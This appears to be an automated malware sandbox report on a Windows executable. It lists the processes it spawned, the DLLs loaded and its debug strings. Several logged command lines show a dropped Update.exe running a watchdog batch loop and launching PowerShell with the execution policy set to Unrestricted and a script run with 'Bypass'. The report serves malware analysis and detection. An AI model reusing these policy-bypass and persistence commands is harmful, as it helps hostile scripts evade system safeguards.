Source: C:\Users\user\Desktop\Uulw5M1DfU.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\Update.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\Bilite\Axialis\Update.exe C:\Users\Public\Bilite\Axialis\Update.exe
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "Update.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "Update.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "Update.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "Update.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Users\user\Desktop\Uulw5M1DfU.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\Update.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\Bilite\Axialis\Update.exe C:\Users\Public\Bilite\Axialis\Update.exe	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat"	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "Update.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "Update.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "Update.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "Update.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1	Jump to behavior

Source: C:\Users\user\Desktop\Uulw5M1DfU.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uulw5M1DfU.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uulw5M1DfU.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uulw5M1DfU.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uulw5M1DfU.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uulw5M1DfU.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uulw5M1DfU.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uulw5M1DfU.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uulw5M1DfU.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uulw5M1DfU.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uulw5M1DfU.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uulw5M1DfU.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uulw5M1DfU.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uulw5M1DfU.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uulw5M1DfU.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uulw5M1DfU.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uulw5M1DfU.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uulw5M1DfU.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uulw5M1DfU.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uulw5M1DfU.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uulw5M1DfU.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uulw5M1DfU.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Section loaded: update.dll	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Section loaded: dinput8.dll	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Section loaded: inputhost.dll	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Section loaded: devenum.dll	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Section loaded: msdmo.dll	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll

Source: C:\Users\Public\Bilite\Axialis\Update.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00021401-0000-0000-C000-000000000046}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe"

Source: ldplayer9_ld_6000_ld.exe.lnk.3.dr

LNK file: ..\..\Public\Bilite\ldplayer9_ld_6000_ld.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Uulw5M1DfU.exe

Static file information: File size 67003808 > 1048576

Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb9 source: powershell.exe, 00000012.00000002.2573546092.0000000008838000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: H:\trunk_download\downloader_cn\downloader\bin\ldplayerinst.pdb source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, ldplayer9_ld_6000_ld.exe.0.dr
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000012.00000002.2573546092.0000000008838000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Administrator\Desktop\MFCLibrary_YSS\Release\Update.pdb source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002AF6000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: E:\agent\workspace\p-e3cf6c00cb1d4f41832c02872427999a\src\Ufo4WinMac\GamerUFO\ufo4Desktop\Output\bin\Release\UpdateApp.pdb source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002AF6000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000003.00000002.3509363216.00000000006E2000.00000002.00000001.01000000.00000005.sdmp, Update.exe, 00000003.00000000.1746874301.00000000006E2000.00000002.00000001.01000000.00000005.sdmp, Update.exe.0.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb_qF source: powershell.exe, 00000012.00000002.2569455874.000000000776B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000012.00000002.2561569868.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000012.00000002.2573546092.0000000008838000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000012.00000002.2569455874.000000000776B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\agent\workspace\p-e3cf6c00cb1d4f41832c02872427999a\src\Ufo4WinMac\GamerUFO\ufo4Desktop\Output\bin\Release\UpdateApp.pdb((& source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002AF6000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000003.00000002.3509363216.00000000006E2000.00000002.00000001.01000000.00000005.sdmp, Update.exe, 00000003.00000000.1746874301.00000000006E2000.00000002.00000001.01000000.00000005.sdmp, Update.exe.0.dr
